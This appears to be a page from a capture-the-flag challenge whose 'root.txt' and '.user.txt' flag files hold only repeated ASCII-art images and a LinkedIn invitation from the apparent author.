░░█▀░░░░░░░░░░░▀▀███████░░░░ ░░█▌░░░░░░░░░░░░░░░▀██████░░░ ░█▌░░░░░░░░░░░░░░░░███████▌░░ ░█░░░░░░░░░░░░░░░░░████████░░ ▐▌░░░░░░░░░░░░░░░░░▀██████▌░░ ░▌▄███▌░░░░▀████▄░░░░▀████▌░░ ▐▀▀▄█▄░▌░░░▄██▄▄▄▀░░░░████▄▄░ ▐░▀░░═▐░░░░░░══░░▀░░░░▐▀░▄▀▌▌ ▐░░░░░▌░░░░░░░░░░░░░░░▀░▀░░▌▌ ▐░░░▄▀░░░▀░▌░░░░░░░░░░░░▌█░▌▌ ░▌░░▀▀▄▄▀▀▄▌▌░░░░░░░░░░▐░▀▐▐░ ░▌░░▌░▄▄▄▄░░░▌░░░░░░░░▐░░▀▐░░ ░█░▐▄██████▄░▐░░░░░░░░█▀▄▄▀░░ ░▐░▌▌░░░░░░▀▀▄▐░░░░░░█▌░░░░░░ ░░█░░▄▀▀▀▀▄░▄═╝▄░░░▄▀░▌░░░░░░ ░░░▌▐░░░░░░▌░▀▀░░▄▀░░▐░░░░░░░ ░░░▀▄░░░░░░░░░▄▀▀░░░░█░░░░░░░ ░░░▄█▄▄▄▄▄▄▄▀▀░░░░░░░▌▌░░░░░░ ░░▄▀▌▀▌░░░░░░░░░░░░░▄▀▀▄░░░░░ ▄▀░░▌░▀▄░░░░░░░░░░▄▀░░▌░▀▄░░░ ░░░░▌█▄▄▀▄░░░░░░▄▀░░░░▌░░░▌▄▄ ░░░▄▐██████▄▄░▄▀░░▄▄▄▄▌░░░░▄░ ░▄▀░████████▄▄▄███████▌▀▄░░░░░▄ ▀░░░█████▀▀░░░▀███████░░░▀▄░░░ ░░░░▐█▀░░░▐░░░░░▀████▌░░░░▀▄░ ░░░░░░▌░░░▐░░░░▐░░▀▀█░░░░░░░▀ ░░░░░░▐░░░░▌░░░▐░░░░░▌░░░░░░░
Flags
cat root.txt
░░█▀░░░░░░░░░░░▀▀███████░░░░
░░█▌░░░░░░░░░░░░░░░▀██████░░░
░█▌░░░░░░░░░░░░░░░░███████▌░░
░█░░░░░░░░░░░░░░░░░████████░░
▐▌░░░░░░░░░░░░░░░░░▀██████▌░░
░▌▄███▌░░░░▀████▄░░░░▀████▌░░
▐▀▀▄█▄░▌░░░▄██▄▄▄▀░░░░████▄▄░
▐░▀░░═▐░░░░░░══░░▀░░░░▐▀░▄▀▌▌
▐░░░░░▌░░░░░░░░░░░░░░░▀░▀░░▌▌
▐░░░▄▀░░░▀░▌░░░░░░░░░░░░▌█░▌▌
░▌░░▀▀▄▄▀▀▄▌▌░░░░░░░░░░▐░▀▐▐░
░▌░░▌░▄▄▄▄░░░▌░░░░░░░░▐░░▀▐░░
░█░▐▄██████▄░▐░░░░░░░░█▀▄▄▀░░
░▐░▌▌░░░░░░▀▀▄▐░░░░░░█▌░░░░░░
░░█░░▄▀▀▀▀▄░▄═╝▄░░░▄▀░▌░░░░░░
░░░▌▐░░░░░░▌░▀▀░░▄▀░░▐░░░░░░░
░░░▀▄░░░░░░░░░▄▀▀░░░░█░░░░░░░
░░░▄█▄▄▄▄▄▄▄▀▀░░░░░░░▌▌░░░░░░
░░▄▀▌▀▌░░░░░░░░░░░░░▄▀▀▄░░░░░
▄▀░░▌░▀▄░░░░░░░░░░▄▀░░▌░▀▄░░░
░░░░▌█▄▄▀▄░░░░░░▄▀░░░░▌░░░▌▄▄
░░░▄▐██████▄▄░▄▀░░▄▄▄▄▌░░░░▄░
░▄▀░████████▄▄▄███████▌▀▄░░░░░▄
▀░░░█████▀▀░░░▀███████░░░▀▄░░░
░░░░▐█▀░░░▐░░░░░▀████▌░░░░▀▄░
░░░░░░▌░░░▐░░░░▐░░▀▀█░░░░░░░▀
░░░░░░▐░░░░▌░░░▐░░░░░▌░░░░░░░
░╔╗║░╔═╗░═╦═░░░░░╔╗░░╔═╗░╦═╗░
░║║║░║░║░░║░░░░░░╠╩╗░╠═╣░║░║░
░║╚╝░╚═╝░░║░░░░░░╚═╝░║░║░╩═╝░
invite-me: linkedin.com/in/eliastouguinho
░░█▌░░░░░░░░░░░░░░░▀██████░░░
░█▌░░░░░░░░░░░░░░░░███████▌░░
░█░░░░░░░░░░░░░░░░░████████░░
▐▌░░░░░░░░░░░░░░░░░▀██████▌░░
░▌▄███▌░░░░▀████▄░░░░▀████▌░░
▐▀▀▄█▄░▌░░░▄██▄▄▄▀░░░░████▄▄░
▐░▀░░═▐░░░░░░══░░▀░░░░▐▀░▄▀▌▌
▐░░░░░▌░░░░░░░░░░░░░░░▀░▀░░▌▌
▐░░░▄▀░░░▀░▌░░░░░░░░░░░░▌█░▌▌
░▌░░▀▀▄▄▀▀▄▌▌░░░░░░░░░░▐░▀▐▐░
░▌░░▌░▄▄▄▄░░░▌░░░░░░░░▐░░▀▐░░
░█░▐▄██████▄░▐░░░░░░░░█▀▄▄▀░░
░▐░▌▌░░░░░░▀▀▄▐░░░░░░█▌░░░░░░
░░█░░▄▀▀▀▀▄░▄═╝▄░░░▄▀░▌░░░░░░
░░░▌▐░░░░░░▌░▀▀░░▄▀░░▐░░░░░░░
░░░▀▄░░░░░░░░░▄▀▀░░░░█░░░░░░░
░░░▄█▄▄▄▄▄▄▄▀▀░░░░░░░▌▌░░░░░░
░░▄▀▌▀▌░░░░░░░░░░░░░▄▀▀▄░░░░░
▄▀░░▌░▀▄░░░░░░░░░░▄▀░░▌░▀▄░░░
░░░░▌█▄▄▀▄░░░░░░▄▀░░░░▌░░░▌▄▄
░░░▄▐██████▄▄░▄▀░░▄▄▄▄▌░░░░▄░
░▄▀░████████▄▄▄███████▌▀▄░░░░░▄
▀░░░█████▀▀░░░▀███████░░░▀▄░░░
░░░░▐█▀░░░▐░░░░░▀████▌░░░░▀▄░
░░░░░░▌░░░▐░░░░▐░░▀▀█░░░░░░░▀
░░░░░░▐░░░░▌░░░▐░░░░░▌░░░░░░░
░╔╗║░╔═╗░═╦═░░░░░╔╗░░╔═╗░╦═╗░
░║║║░║░║░░║░░░░░░╠╩╗░╠═╣░║░║░
░║╚╝░╚═╝░░║░░░░░░╚═╝░║░║░╩═╝░
invite-me: linkedin.com/in/eliastouguinho
cat .user.txt
% ,%&&&%#.
% *&&&%&&&%&&&%&&&%
% &&&%& .%&&&%
% &&&%# %&&&%
% /&&&%& &&&%
% %&%/ %&&&*
% .& (%%(, ,(&&&* %&&
% &&&% %&&&%&&&%&&&%&&%&%# &&&
% &&&%&&&%&&& #&&&%&&&&&* &&&%&&&%
% &&&%&&&%&&&%&&&%& /&&&%&&&%&&&%&&
% &&&%&&&% &&&%&&&%
% %&&&%&&& /&&&%&&&%&
% &.%&&&% %&&&% &&&%& %&/*&
% &&&%&&&%&& %&&&%# %%&&&% %&&&%&&&%&
% /&%&/ *&&&%&& %&&&%&&%& &&&%&&. %&&&.
% &&&% &&&%& %%%% .&&&
% &&&% &&&
% %&&&. *&%&&&%&&&%&&&%&&&%&&&%&&&%&&&&%&&& /&&&(
% /&& #&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&&* %&&
% &&&% ,&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&& %&%
% &&& %&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&& %&&
% &&& &&&%&&&%&&&%&&&%&%& %&&&%&&&%&&&%& &&
% %&&&% &&&%&&&%&&&%&&&%& &&&%&&&%&&&%&% &%&#
% &&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&
% &%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%
% &&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&
% *&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&
% &&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&
% #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%(
invite-me: linkedin.com/in/eliastouguinho/
% *&&&%&&&%&&&%&&&%
% &&&%& .%&&&%
% &&&%# %&&&%
% /&&&%& &&&%
% %&%/ %&&&*
% .& (%%(, ,(&&&* %&&
% &&&% %&&&%&&&%&&&%&&%&%# &&&
% &&&%&&&%&&& #&&&%&&&&&* &&&%&&&%
% &&&%&&&%&&&%&&&%& /&&&%&&&%&&&%&&
% &&&%&&&% &&&%&&&%
% %&&&%&&& /&&&%&&&%&
% &.%&&&% %&&&% &&&%& %&/*&
% &&&%&&&%&& %&&&%# %%&&&% %&&&%&&&%&
% /&%&/ *&&&%&& %&&&%&&%& &&&%&&. %&&&.
% &&&% &&&%& %%%% .&&&
% &&&% &&&
% %&&&. *&%&&&%&&&%&&&%&&&%&&&%&&&%&&&&%&&& /&&&(
% /&& #&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&&* %&&
% &&&% ,&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&& %&%
% &&& %&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&& %&&
% &&& &&&%&&&%&&&%&&&%&%& %&&&%&&&%&&&%& &&
% %&&&% &&&%&&&%&&&%&&&%& &&&%&&&%&&&%&% &%&#
% &&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&
% &%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%
% &&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&
% *&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&
% &&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&
% #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%(
invite-me: linkedin.com/in/eliastouguinho/